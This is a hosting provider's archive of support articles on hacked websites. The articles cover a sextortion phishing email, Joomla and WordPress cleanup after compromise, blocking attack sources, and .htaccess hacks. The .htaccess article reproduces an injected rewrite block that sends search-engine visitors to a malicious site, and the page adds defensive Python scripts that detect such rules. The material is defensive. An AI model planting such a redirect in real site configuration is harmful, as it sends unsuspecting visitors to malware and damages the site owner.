Troubleshooting Hacked Websites Archives - InMotion Hosting Support Center
https://www.inmotionhosting.com/support/website/hacks/
Web Hosting Support & Tutorials, Wed, 02 Aug 2023 21:16:24 +0000

How to Deal With the “on this day I hacked your OS” Phishing Scam Email
https://www.inmotionhosting.com/support/email/scam-email-on-this-day-i-hacked-your-os/
Fri, 18 Oct 2019 17:21:58 +0000
How to Deal With Phishing Scam Emails

In this article, we cover a phishing email starting with the following sentence:

on this day I hacked your OS and got full access to your account user@example.com

Such phishing emails aim to create feelings of desperation and fear. We want to combat this by ensuring you better understand how to deal with such issues.

Email users may receive this email regardless of hosting plan, content management system (CMS), email provider, spam filter, and other hosting features.

IMPORTANT: We are not security specialists. The information below may not be up-to-date best practices to combat phishing and other cyber attacks. We recommend contacting Sucuri for expert advice and a web-application firewall for better security.

Recommendations

We’re going to display the email in parts and offer recommendations for each section.

Email

I have very bad news for you.
[Date] – on this day I hacked your OS and got full access to your account [email address].
You can check it – I sent this message from your account.

So, you can change the password, yes.. But my malware intercepts it every time.

Truth: “Malware” is the abbreviation for malicious software. Scammers and bots can acquire your email address without hacking your computer or website. Is your email address on your website contact page, social media contact sections, or business card? Do you have domain privacy?

Solution:

  • Remove your email account from public view, or only place it on sites that require completing reCAPTCHA to view it.
  • Use a contact form on your website instead, such as the security-oriented Contact Form 7 for WordPress, to better filter spam.
  • Create a different email account for administration tasks and for correspondence.
  • Register your email addresses with HaveIBeenPwned.com for notifications on confirmed intrusions.
  • Use a password manager and strong passwords instead of saving them within your browser. Most browsers do not encrypt saved login credentials by default.

Router

How I made it:
In the software of the router, through which you went online, was a vulnerability.
I just hacked this router and placed my malicious code on it.
When you went online, my trojan was installed on the OS of your device.

Truth: While this is possible, you should contact your internet service provider (ISP) regarding vulnerabilities and assistance enhancing your home network router. A trojan [horse] is a file that looks legitimate but includes malware.

Solution:

Interested in upgrading your server security? Check out our VPS Hosting plans and be sure to bookmark our guide on VPS Security.

Backup

After that, I made a full dump of your disk (I have all your address book, history of viewing sites, all files, phone numbers and addresses of all your contacts).

Truth: This is possible, regardless of your operating system, but a lot of factors determine its likelihood.

Solution:

  • Create, and verify, backups for cPanel and local devices to an external location regularly.
  • Use multi-factor authentication (MFA / 2FA) whenever possible.

Ransomware

A month ago, I wanted to lock your device and ask for a not big amount of btc to unlock.
But I looked at the sites that you regularly visit, and I was shocked by what I saw!!!
I’m talk you about sites for adults.

Truth: It is possible to capture activity between a user and a website or server. This is called a man-in-the-middle (MITM) attack. It is a common issue on public Wi-Fi networks such as those in airports and restaurants. It is also possible when a user runs Google searches on a computer while logged in, or on an infected mobile device.

Solution:

  • Navigate websites with HTTPS only, especially e-commerce sites.
  • Consider using a virtual private network (VPN) for web browsing.
  • Only use trusted Wi-Fi networks.

Remember, this article is meant to be primarily informative. Contact Sucuri for expert advice on how to secure your website.

Bitcoin

Pay ONLY in Bitcoins!
My BTC wallet: #########################

You do not know how to use bitcoins?
Enter a query in any search engine: “how to replenish btc wallet”.
It’s extremely easy

Truth: Don’t search that phrase. As stated in the previous truth above, if anyone is able to see your network activity, searching that phrase shows them that you’re more susceptible to future phishing attacks.

Solution: Ignore this. If you have Bitcoin, check your payment history for theft.

Payment

For this payment I give you two days (48 hours).
As soon as this letter is opened, the timer will work.

After payment, my virus and dirty screenshots with your enjoys will be self-destruct automatically.

Truth: There is no way to verify that any stolen data will be destroyed. The unfortunate truth is that if it was stolen, it has likely already been sold.

Solution: Ignore this.

Locked

If I do not receive from you the specified amount, then your device will be locked, and all your contacts will receive a screenshots with your “enjoys”.

Truth: Many cyber attacks are triggered by a specific condition, such as a particular date, time, or user action. Ransomware that waits for such a trigger is an example of a logic bomb.

Solution:

  • To be safe, use AV scanners to search for malware.
  • Ensure you have up-to-date cPanel and device backups.

Security

I hope you understand your situation.
– Do not try to find and destroy my virus! (All your data, files and screenshots is already uploaded to a remote server)
– Do not try to contact me (you yourself will see that this is impossible, I sent you an email from your account)
– Various security services will not help you; formatting a disk or destroying a device will not help, since your data is already on a remote server.

Truth:

  • Searching for possible malware on your server and local devices is more important than worrying about what’s on a remote server.
  • There may be useful information in the email header information. Live Support and our partners Sucuri can help you with this.
  • Various security services, such as this article, can help you better understand how to better detect and combat phishing.

Solution:

  • Ensure all software is up to date.
  • Follow our guide to strengthen email authentication and mitigate email spoofing. Keep the email for a security specialist to review or delete it.
  • Contact Live Support for an account scan and further security advice related to your hosting plan, installed CMS(s), Softaculous (VPS and Dedicated only), etc.
  • Stay tuned for our article on how to detect phishing.

Honor

P.S. You are not my single victim. so, I guarantee you that I will not disturb you again after payment!
This is the word of honor hacker.

Truth: You are not the only person to receive this email.

Solution: Ignore the rest.

Antivirus

I also ask you to regularly update your antiviruses in the future. This way you will no longer fall into a similar situation.

Do not hold evil! I just do my job.

Truth: We request you take cybersecurity seriously. Unfortunately, software cannot completely eliminate the possibility of phishing and other cyber attacks. The best way to mitigate cyber attacks is user awareness and training.

Solution: Stay alert when browsing the web and checking your email.

Questions?

Do you have more questions? Let us know below.

Do you have questions about how to secure your CMS? Check our Support Center. If we haven’t covered it yet, request it below or in our Community Support Center!

This article will be updated as we cover more related topics.

How To Hide WordPress Version From Hackers
https://www.inmotionhosting.com/support/edu/wordpress/how-to-hide-your-wordpress-version-from-hackers/
Tue, 10 Sep 2019 15:45:07 +0000

Every moment your website is online, it can be preyed upon by hackers. If you have a WordPress site, you can be certain it will be targeted at some point. The question is not if attempts will be made to compromise your site, it’s when. But there’s hope! If you follow a few basic security procedures, you can make your site more resilient to the many attacks it will face over its lifetime.

In this article, you’ll learn why you must hide your WordPress version number and how to hide it.

Why You Must Hide Your WordPress Version Number

Your WordPress version number says more about your site than you may think. Every time WordPress makes updates or fixes bugs, the changes are documented in detailed release notes. This means the general public knows which security bugs affect which version, and therefore attackers know exactly what kind of attack to use on your website. This is why it’s very important to hide your version number. Anyone can find your WordPress version by simply viewing the source code of your site in any web browser.

You may be wondering, should I just update my site automatically? Yes, updating your site whenever prompted (or even automatically) is a way to avoid possible security breaches. But, for one reason or another, updates may be skipped or ignored altogether. Either way, it’s best to hide your version number.

How To Hide Your WordPress Version Number

For this tutorial, you will use the WP Security Safe plugin. This plugin is a good choice for security because it’s very lightweight and will not slow your website down.

Please note: it’s recommended that you not install more than one security plugin on your WordPress site.

  1. Log into your WordPress Dashboard
  2. Click the WP Security Safe link in the left side panel
  3. Choose the Privacy tab
  4. Check the box for Hide WordPress Version Publicly
  5. Click Save Settings at the bottom of the plugin menu

Well done! You’ve successfully hidden your WordPress version from snoopers. If you have any questions or comments feel free to leave them below.

Banning known hack sources from your WordPress site
https://www.inmotionhosting.com/support/edu/wordpress/banning-known-hack-sources-from-your-wordpress-site/
Mon, 03 Nov 2014 19:27:43 +0000

Preventing malicious attacks before they are even attempted is often one of the best defenses against your website becoming hacked. Of course, there is no replacement for a securely developed site, but a large majority of attacks can be blocked by simply banning malicious sources from your WordPress site. In this article, we will show you how to block a large majority of malicious sources using iThemes Security with just a few clicks.

  1. Begin by logging into your WordPress admin dashboard.
  2. This article assumes that you already have iThemes Security on your site. If you do not already have iThemes Security installed, you may review our article on installing iThemes Security.
  3. Within your WordPress admin, hover over Security on the left side menu and click on Settings.
    (Screenshot: Security settings in dashboard)
  4. Next, scroll down to the Banned Users section.
    (Screenshot: Banned Users section)
  5. Within this section, check the box next to Default Blacklist. This will automatically ban from your site any IP addresses or user agents that are found within the blacklists on hackrepair.com.
    (Screenshot: Default Blacklist)
  6. Once the changes are made, be sure to click on Save All Changes.

After setting this option, many malicious sources and bots that may be increasing your website resource usage will now be permanently banned from your site. As these lists are updated regularly, using it is quite effective in automatically blocking known attack sources.

Fix Joomla Hack and Upgrade for Security
https://www.inmotionhosting.com/support/security/fix-joomla-hack-and-upgrade-for-security/
Sat, 09 Nov 2013 00:50:59 +0000

Joomla is a very popular Content Management System (CMS) that can make your website publishing life easier. However, just like any other software, if you don’t keep it up to date, you could be opening yourself up to headaches down the road.

Nothing is worse than having your website suddenly defaced with messages you don’t approve of, malicious hacks running on your site possibly infecting your visitors, and losing rank in search engines.

Securing Joomla

In this guide, I’ll try to cover all the Joomla security basics of making sure these problems don’t happen to you.


Ensure Current Joomla Version is Secure

If you still have the now very out-of-date Joomla 1.5 running on the Internet, chances are your website is getting attacked on a semi-regular basis. Unfortunately, with all the known exploits for Joomla 1.5 in the wild, it’s probably just a matter of time before one of them successfully hacks your Joomla website.

Below is a table of the various versions of Joomla and how old they are. The End of Life date marks the date after which there is no further bug or security support for that release, making it more prone to attacks.

Joomla Version Branch | Latest | Release Date | Last Release | End of Life | Upgrade Path
--- | --- | --- | --- | --- | ---
1.5 | 1.5.26 | January 22 2008 | March 27 2012 | September 2012 | Migrate to 2.5
1.6 | 1.6.6 | April 22 2009 | July 26 2011 | August 2011 | One-click to 2.5
1.7 | 1.7.5 | July 19 2011 | February 2 2012 | February 2012 | One-click to 2.5
2.5 | 2.5.14 | January 24 2012 | August 01 2013 | December 31st, 2014 | One-click to 3.x
3.0 | 3.0.4 | September 27 2012 | February 4 2013 | May 2013 | One-click to 3.1
3.1 | 3.2.0 | April 24 2013 | November 6 2013 | Nov 2013 | One-click to 3.2
3.2 | 3.2.0 | November 6 2013 | November 6 2013 | April 2014 | One-click to 3.3
3.3 | 3.3.4 | April 20 2014 | September 23 2014 | September 2014 | One-click to 3.4
3.4 | 3.4.8 | February 24 2015 | December 24 2015 | December 2015 | One-click to 3.5
3.5 | 3.5.1 | March 21 2016 | April 05 2016 | April 2016 | One-click to 3.6
3.6 | 3.6.5 | July 12 2016 | December 13 2016 | December 2016 | One-click to 3.7
3.7 | 3.7.5 | April 25 2017 | August 17 2017 | Release of 3.8 (TBD) | One-click to 3.8

Find and Clean Up a Joomla Hack

If your website has been attacked and compromised sometimes it will be very apparent. You might have malicious redirects taking your visitors to some other website, content appearing on your website that you didn’t create, and typically your account’s resource usage will be higher when under attack or running any hacks.

Here are some common things you can look at if you suspect your Joomla website is under attack or hacked:

  1. Check to see if the Google Safe Browsing Diagnostic page has detected any known malware running on your website. If your domain name was example.com, you would use the following URL to check: https://www.google.com/safebrowsing/diagnostic?site=example.com

    You can also use the Sucuri Security free website malware scanner, again accessed via a URL like:
    https://sitecheck.sucuri.net/results/example.com
  2. Follow our recovering after a hack guide which goes over updating your cPanel and FTP passwords, and also scanning your local computer to ensure you aren’t uploading malicious files unknowingly to the server.
  3. Clean up a .htaccess hack if your website is redirecting visitors or search engines to other sites without your consent.
  4. Clean up a code injection attack if you notice strange behavior from your pages, or if you see injected keywords or other types of spam in your content.
  5. Enable raw access logs in cPanel so that you have a historical record of your website requests; this can be handy when trying to track down malicious activity.
  6. Block unwanted users with your .htaccess file to prevent possible hack attempts from known bad IP addresses or User-Agent strings.

Reinstall Joomla After a Hack to Prevent Further Exploits

While you might be able to clean up most traces of an attack and hack against your Joomla website, once an attacker has successfully exploited a part of your site, it can be extremely hard to ensure that all traces of the hack are removed.

A lot of times once a Joomla site has been hacked, it gets added to a list by the attacker, and then they’ll more than likely keep coming back trying to exploit it again and again until you’ve upgraded to protect yourself from the exploits available in the wild.

Below I’ll walk you through the process of taking a Joomla 1.5 site that has been hacked, reinstalling Joomla itself to rule out any malicious files still being on your account, and then upgrading to Joomla 2.5 to help ensure the same hack isn’t allowed to be uploaded to the website again.

  1. Log into your Joomla admin to double-check that you already have the latest version of Joomla 1.5, which should be Joomla 1.5.26. If you have an older release of Joomla 1.5 you need to first upgrade from an existing Joomla 1.5.x version.
    (Screenshot: Joomla Admin Dashboard)
  2. Using your favorite FTP client, download all of your current Joomla folders and files to your local computer. In this case, I’m using FileZilla, connecting to my site example.com, navigating to the /public_html directory where Joomla is installed, then selecting all the folders and files by clicking on one and hitting Ctrl-A to select all. Then I’m dragging them all to a local folder called /Downloads/Joomla that I created.
  3. Next, back up your Joomla database in cPanel so that you have a copy of that as well. At this point, you have all the physical files that make up your Joomla website. In the event that the steps below for reinstalling and upgrading Joomla do not work for you, you’ll at least be able to restore your site to its hacked state.
  4. Now that you have a local copy of all your potentially hacked Joomla files, you can safely remove them from the server. This can be done by selecting all of your Joomla files in your FTP client and hitting Delete on your keyboard. If your main website is running Joomla, this would be all the files in the /public_html directory.
    Please note that you might have other files on your account besides Joomla. If you delete these as well and don’t re-upload them from the local copies you’ve downloaded, they will no longer be present on your account.
  5. Download the last release of Joomla 1.5 by clicking on this link for Joomla 1.5.26. You should now have a Joomla_1.5.26-Stable-Full_Package.zip archive on your local computer. This contains all of the core files needed to run a Joomla website.
  6. Upload the Joomla_1.5.26-Stable-Full_Package.zip to your /public_html directory, which should now be empty.
  7. Access the File Manager in cPanel and navigate to your /public_html directory. Then right-click on the Joomla_1.5.26-Stable-Full_Package.zip file you uploaded, and click on Extract.
    In the Extract window that pops up, we can leave the extraction directory set to /public_html and click on Extract File(s) so that all of the Joomla core files are placed there.
    It might take a few minutes for the .zip file to finish inflating; once it completes, click on the Close button.
  8. At this point, if you visit your website where Joomla was installed, you will get the Joomla installation screen, since we have just deleted the old Joomla site and uploaded fresh Joomla core files. Next, re-upload your configuration.php file back to the server. This file contains information such as which database Joomla should use.
    You’ll also want to delete the installation folder, as this is a security requirement of Joomla.
  9. Now if you go to your Joomla website again, it should have all of your content pulled from the Joomla MySQL database, but it will now be running on verified clean core files. Hopefully, any traces of the hack you found on your account are now gone. However, if you are still seeing strange activity, this could mean the attacker successfully exploited your Joomla database, in which case a more thorough investigation of your database is needed.
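As an added check that is not part of the original article, the script below compares the files downloaded in step 2 against the extracted clean Joomla_1.5.26-Stable-Full_Package.zip, reporting core files whose contents differ, files that are not part of the core at all, and core files that are missing. The folder layout and the sample files it builds are constructed for the demonstration; configuration.php and the installation folder are treated specially because the steps above keep the former and delete the latter.

```python
"""Compare downloaded site files against a clean Joomla core package.

Added example (not InMotion Hosting's or Joomla's code). The "site" tree
stands for the folder downloaded from the server, the "clean" tree for the
extracted clean Joomla package; both are constructed here for the demo.
"""
import hashlib
import tempfile
from pathlib import Path

# Files that are legitimately site-specific and therefore never in the package
SITE_SPECIFIC = {"configuration.php", ".htaccess"}
# The package's installer directory must be deleted after install (see step 8)
IGNORED_CORE_PREFIXES = ("installation/",)


def sha256_file(path):
    """Hex SHA-256 of a file, read in chunks so large files are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def tree_digests(root):
    """Map each file under root (POSIX-style relative path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def compare_to_clean_core(site_root, clean_root):
    """Return modified core files, non-core files, and missing core files."""
    site, clean = tree_digests(site_root), tree_digests(clean_root)
    modified = sorted(p for p in site if p in clean and site[p] != clean[p])
    extra = sorted(p for p in site if p not in clean and p not in SITE_SPECIFIC)
    missing = sorted(p for p in clean if p not in site
                     and not p.startswith(IGNORED_CORE_PREFIXES))
    return {"modified": modified, "extra": extra, "missing": missing}


def build_demo_trees(base):
    """Create a constructed clean package and a constructed hacked site.

    Returns (site_root, clean_root). File contents are placeholders.
    """
    base = Path(base)
    clean, site = base / "clean", base / "site"
    core = {
        "index.php": "<?php // joomla front controller (constructed)\n",
        "libraries/joomla/factory.php": "<?php // factory (constructed)\n",
        "installation/index.php": "<?php // installer (constructed)\n",
    }
    for rel, body in core.items():
        for root in (clean, site):
            path = root / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body)
    # Site-side differences: a tampered core file, a non-core file dropped
    # into an upload directory, the site's own configuration.php, a core
    # file that is missing, and the installer directory removed as required.
    (site / "index.php").write_text(core["index.php"] + "// appended line (constructed)\n")
    (site / "images").mkdir(parents=True, exist_ok=True)
    (site / "images" / ".cache.php").write_text("<?php // not a core file (constructed)\n")
    (site / "configuration.php").write_text("<?php // site settings (constructed)\n")
    (site / "libraries" / "joomla" / "factory.php").unlink()
    (site / "installation" / "index.php").unlink()
    (site / "installation").rmdir()
    return site, clean


def demo_report():
    """Run the comparison on the constructed trees and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        site, clean = build_demo_trees(tmp)
        return compare_to_clean_core(site, clean)


if __name__ == "__main__":
    print(demo_report())
```

Anything listed under "modified" or "extra" deserves a look before the site goes back online; "missing" core files are restored by the clean package anyway.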

Upgrade Joomla 1.5 to 2.5 to Prevent Hacks

Now that you’ve hopefully successfully removed any hacks from your old Joomla 1.5 site, it is very important to update your installation to Joomla 2.5 so that an attacker doesn’t simply come back and hack your website again.

This technically isn’t an upgrade, but a migration, as the two versions of Joomla aren’t directly compatible. The process can vary greatly depending on the complexity of your Joomla website and what modules or extensions you’ve used. We would strongly recommend at least glancing at the official Joomla documentation that they have for migrating from Joomla 1.5 to Joomla 2.5 before proceeding with the steps below.

  1. You can use the jUpgrade extension, which can be downloaded directly from jUpgrade downloads. You should end up with a com_jupgrade-2.5.2.zip archive of the extension.
  2. Log in to your Joomla admin. Then hover over Extensions and click on Install / Uninstall.
  3. Under the Upload Package File section, click on Choose file and browse your local computer for the com_jupgrade-2.5.2.zip file. Then click on Upload files & Install.
  4. Hover over Extensions again, and this time click on Plugin Manager.
  5. In the Filter field, type in mootools and click Go. Beside the System – Mootools Upgrade plugin, click on the red x under the Enabled column to enable the plugin.
  6. Hover over Components, then click on jUpgrade.
  7. Now click on the big Start Upgrade button to begin the process.
    You should see the jUpgrade upgrade begin, and it will update you on the current step in the process. When complete you’ll get a Joomla 2.5 Upgrade Finished! message.
  8. Now if you visit your website with /jupgrade appended to the end, you should see your upgraded Joomla site. jUpgrade leaves your main Joomla 1.5 site intact so you can test things. Here you can see that on my example.com site, when accessing the /jupgrade directory, the Main Menu, for instance, has changed.
  9. Now in your FTP client again, create a new folder called old_joomla. This can be done by right-clicking on the server side of the file list and selecting Create directory; in the Create directory pop-up, enter the name of the directory and click OK.
    Next, click on any of the files or folders, and then hit Ctrl-A to select all the files. Then hold Ctrl and click on the newly created old_joomla directory to de-select it, and also the jupgrade folder. Finally, drag all of the other selected files into the old_joomla directory.
  10. Now navigate into the jupgrade folder, hit Ctrl-A to select all files, then drag them up into the /public_html directory one level up.
  11. Now you should see the Joomla 2.5 website when accessing your domain normally, and if you log in to the Joomla admin, you’ll notice the new version reflected as well.
    (Screenshots: Joomla 2.5 upgrade complete, main site and admin)

Hopefully, you now have a good idea of how to ensure your Joomla website isn’t currently hacked, and if it was how to clean up the hack or reinstall Joomla. Make sure going forward you always keep your Joomla install updated to prevent any further issues, and as always if you’re still having any issues please leave us a comment!

Malicious user activity and hacks
https://www.inmotionhosting.com/support/website/hacks/malicious-user-activity-and-hacks/
Mon, 04 Mar 2013 23:47:31 +0000

In this article I’m going to explain why stopping malicious user activity and hacks from running on your account is important for keeping your account’s resource usage low.

What is a malicious user?

Your website is open to anyone on the Internet. With that availability to the world come certain risks, one of them being a user who simply wants to be malicious and cause problems for others.

Typically, malicious activity happens in bulk, and this can make the server work extra hard. Because of this, it’s important to identify and stop it, so that the activities of a few malicious users don’t ruin the experience for all of your other users.

The most common activities for a malicious user are spamming or trying to hack into your website. You can read about stopping brute force and spam attacks or dealing with spam in your posts and comments for ways to help limit these types of malicious activity.

Hacked website

A hacked website can easily lead to a lot of extra resource usage on your account, as a hacked website will typically try to do multiple things for each page load on top of what your normal website already does. Hacking activity is usually automated as well, and this typically also leads to a higher amount of resource usage to handle the flood of requests.

If your website has already been hacked, then you might also like to learn about cleaning up a .htaccess hack or clean up a code injection attack which are common ways hackers will try to re-direct traffic from your site.

If you have a WordPress site you could also learn how to reinstall WordPress after a hack to make sure you’ve removed all traces of the break in. If you just have a lot of comment spam then you could read about WordPress comment spam clean up to help with that.

Blocking access to website

When your account has to deal with activity from malicious users it can cause resource usage problems, and in extreme cases even lead to an account suspension.

You can learn how to block unwanted users from your site using .htaccess to limit certain users from accessing your site at all. If you have one website that is causing problems you could also try to disable the problematic site for troubleshooting so it doesn’t cause problems for the rest of your websites while trying to track down the problem.

You should now have a better understanding of what a malicious user is, and how the activity from a malicious user or hack could cause excessive resource usage on your account.

.htaccess Hack Cleanup
https://www.inmotionhosting.com/support/website/cleaning-up-a-htaccess-hack/
Tue, 04 Dec 2012 19:09:14 +0000

In this article we’ll discuss steps you can take to clean up a .htaccess hack. The .htaccess file is used primarily to set up rewrite rules that control the way your site is accessed. You might not notice that your .htaccess file has been hacked until either a manual investigation, or you happen to get a malware warning on your website that it’s redirecting to a malicious site.

Sometimes you might notice in your web browser’s status bar that a foreign website is attempting to load content on your website, or you might see a web browser warning. These can be common signs of a .htaccess hack; you might also notice that you’ve fallen in search engine rankings. The typical reason for this is that hackers modify your .htaccess file so that when search engine bots crawl your website they are redirected to the website the hacker has put in place instead of your own.

You can do a quick outside spot check using Google’s Safe Browsing diagnostic page to see if they’ve detected anything malicious on your site in their most recent crawl. You would simply want to replace example.com with your actual domain name in the following URL:

https://google.com/safebrowsing/diagnostic?site=example.com

You can also read more about the Google Safe Browsing page.

Following the steps below you can learn how to check your .htaccess file for hacks, and how to clean them up if you do find any.

.htaccess hacked clean up steps

  1. Login to your cPanel.
  2. Under the Files section, click on File Manager.
  3. In the top right-hand corner, click on Settings. Select the Document Root for: option, and choose your domain from the drop-down.
  4. Ensure that Show Hidden Files is selected.
  5. Then click Save.
    (Screenshot: File Manager hidden files setting)
  6. Right-click on the .htaccess file and select Edit.
    (Screenshot: File Manager .htaccess edit)
  7. You might get a text editor encoding dialog box pop-up; you can simply click on Edit.
  8. Scroll up and down the document and look for any code that seems to be out of place. More than likely you’ll see something along the following lines if your .htaccess file has been hacked:

    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .* https://MaliciousDomain.tld/bad.php?t=3 [R,L]

    What this rewrite code does is check the referrer of each request; if it is a popular search engine, the request is redirected to the attacker’s MaliciousDomain.tld website, which tries to load the bad.php malicious script.

    Because these RewriteCond conditions would not match when you visit your own site directly, and only match requests that arrive with a search engine referrer, these hacks can go unnoticed for some time. Unfortunately, the longer they are active, the more potential they have to affect your search engine ranking.

  9. To remove these malicious rewrites, simply highlight all of the malicious rewrite text, hit Delete on your keyboard, and then click on Save Changes at the top-right to save the file. If you aren’t 100% confident that you’ve found malicious redirect code, we recommend backing up your .htaccess file prior to making edits. This can be done by right-clicking on the .htaccess file in the File Manager, selecting Copy, choosing a copy path such as /public_html/.htaccess-BAK, and then clicking on Copy File(s).
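The referrer-gated redirect shown in step 8 can be found automatically rather than by eye. The script below is an added example, not code from the article or from InMotion Hosting; it assumes the .htaccess contents are available as text and that you know your own hostname (example.com here), and the sample .htaccess it scans is constructed from a standard WordPress rewrite block followed by the injected rules above.

```python
"""Flag .htaccess rewrite rules that send search-engine visitors off-site.

Added example (not InMotion Hosting's code). It walks RewriteCond/RewriteRule
lines and reports every RewriteRule whose target is an absolute URL on a host
other than the site's own, noting whether the preceding RewriteCond lines gate
it on HTTP_REFERER values naming popular search engines.
"""
import re
from urllib.parse import urlparse

# Names the injected conditions typically test the referrer for
SEARCH_ENGINE_HINTS = ("google", "bing", "yahoo", "msn", "ask.com", "aol",
                       "live.com", "altavista", "excite")

REFERER_COND_RE = re.compile(
    r"^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?$", re.IGNORECASE)
RULE_RE = re.compile(
    r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?$", re.IGNORECASE)


def is_search_engine_pattern(pattern):
    """True if a referrer regex from a RewriteCond names a search engine."""
    lowered = pattern.lower()
    return any(hint in lowered for hint in SEARCH_ENGINE_HINTS)


def is_external_host(host, site_host):
    """True if host is neither the site itself nor one of its subdomains."""
    host, site_host = host.lower(), site_host.lower()
    return host != site_host and not host.endswith("." + site_host)


def find_referrer_hijacks(htaccess_text, site_host):
    """Return findings for RewriteRules that redirect to an external host.

    Each finding records the rule's line number, the target host, whether an
    explicit [R] flag is present, whether the rule is gated on search-engine
    referrers, and the HTTP_REFERER patterns collected in front of it.
    """
    findings = []
    referrer_patterns = []  # HTTP_REFERER patterns seen since the last rule
    for lineno, raw in enumerate(htaccess_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cond = REFERER_COND_RE.match(line)
        if cond:
            referrer_patterns.append(cond.group(1))
            continue
        if line.lower().startswith("rewritecond"):
            continue  # a condition on something else, e.g. REQUEST_FILENAME
        rule = RULE_RE.match(line)
        if not rule:
            continue
        target, flags = rule.group(2), rule.group(3) or ""
        flag_list = [f.strip().upper() for f in flags.split(",") if f.strip()]
        parsed = urlparse(target)
        # An absolute-URL substitution redirects the visitor even without [R]
        if (parsed.scheme in ("http", "https") and parsed.netloc
                and is_external_host(parsed.netloc, site_host)):
            findings.append({
                "line": lineno,
                "target_host": parsed.netloc.lower(),
                "redirect_flag": any(f == "R" or f.startswith("R=") for f in flag_list),
                "referrer_gated": any(is_search_engine_pattern(p) for p in referrer_patterns),
                "referrer_patterns": list(referrer_patterns),
            })
        referrer_patterns = []  # conditions apply only to the next RewriteRule
    return findings


# Constructed sample: a normal WordPress block followed by the injected rules
SAMPLE_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* https://MaliciousDomain.tld/bad.php?t=3 [R,L]
"""

if __name__ == "__main__":
    for finding in find_referrer_hijacks(SAMPLE_HTACCESS, "example.com"):
        print(finding)
```

A canonical redirect to www.example.com is not reported because that host belongs to the site; any other external target is listed so it can be reviewed, with referrer_gated marking the pattern this article describes.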

You should now understand how to locate and remove a .htaccess hack that could be causing your website to do a malicious redirection. You’ll more than likely also want to read about steps to take after a hack for more information on how to prevent hacks like this from taking place.

If you’re on a VPS or dedicated server you might also wish to read about how to clean up a code injection attack if more than just your .htaccess file has been hacked.

How to Re-Install WordPress after a Hack
https://www.inmotionhosting.com/support/edu/wordpress/reinstall-wordpress-after-a-hack/
Wed, 14 Nov 2012 01:12:04 +0000

In this article we’ll discuss the steps you’d want to take to re-install WordPress after a hack, to get your site back up and running quickly. In most cases when a WordPress site is hacked, it is because you are not running the latest secure version of WordPress, or one of the plugins you have installed is outdated and has been used by a hacker to exploit the site.

A lot of the time a hacker will inject malicious code in your PHP scripts that can make it very hard to clean up manually after the injections took place. In some cases this might require our system administration department to quarantine your entire WordPress site outside of your public_html directory, so that we can ensure further hacks aren’t taking place and further damage isn’t done to your WordPress database.

If you happen to have read our previous article on how to clean up a code injection attack, the steps mentioned in that article might allow you to clean up any injections that have taken place to get your site back online.

In the steps below we’ll walk through an example site, PrimaryDomain.com, that has been maliciously injected to the point where it’s not going to be easy to remove all the malicious code and ensure we’ve caught all of it. So in this case we’re simply going to reinstall WordPress and then link up the new install with our old database.

Reinstalling WordPress after a Hack

  1. First you’ll want to download the latest version of WordPress to your local computer.
  2. Extract the files in the .zip archive you downloaded to a local folder.
  3. Using FTP, upload all of the folders and files contained within the wordpress directory to your public_html directory. If your domain was an addon domain and its document root was in a sub-directory, make sure you upload them there instead. You can do this by hitting Ctrl-A in your FTP client while in the left-hand pane to select all the files, then simply dragging them onto the server.
  4. Once the files are done uploading, navigate to the quarantine directory on the server side, right-click on wp-config.php and choose View/Edit. Your FTP application should prompt you for the application you’d like to open the file with; a text editor such as Notepad is fine. Then copy down the database information from the define(‘DB_…) sections.
  5. At this point, if you try to simply access the site you’ll get a WordPress error about there being no wp-config.php file.
  6. Back in your FTP client, navigate to your public_html directory and you should see a file called wp-config-sample.php. Right-click on this file, choose View/Edit, open the file in Notepad, then fill in your database name, database user, and database user password.

     Then hit Ctrl-S to save the file. In a few seconds your FTP client should prompt you to save this back to the server; click Yes. You can also place a check beside Finish editing and delete local file if your FTP client gives you that option.
  7. Now in your FTP client right-click on wp-config-sample.php, choose Rename, and name the file just wp-config.php.
  8. If we try to go to our site again at this point, it’s an all blank page. The reason is that our site used a custom theme, and those theme files are still quarantined. So next, in your FTP client navigate to the /quarantine/wp-content/themes directory, and drag the pinboard directory (or whichever theme you used) to your local computer.

     Prior to copying your quarantined theme’s files back to the server, you should scan them for viruses/malware, or preferably re-download a fresh copy of your theme from the developer to ensure no malicious files have been placed inside your theme’s folders.
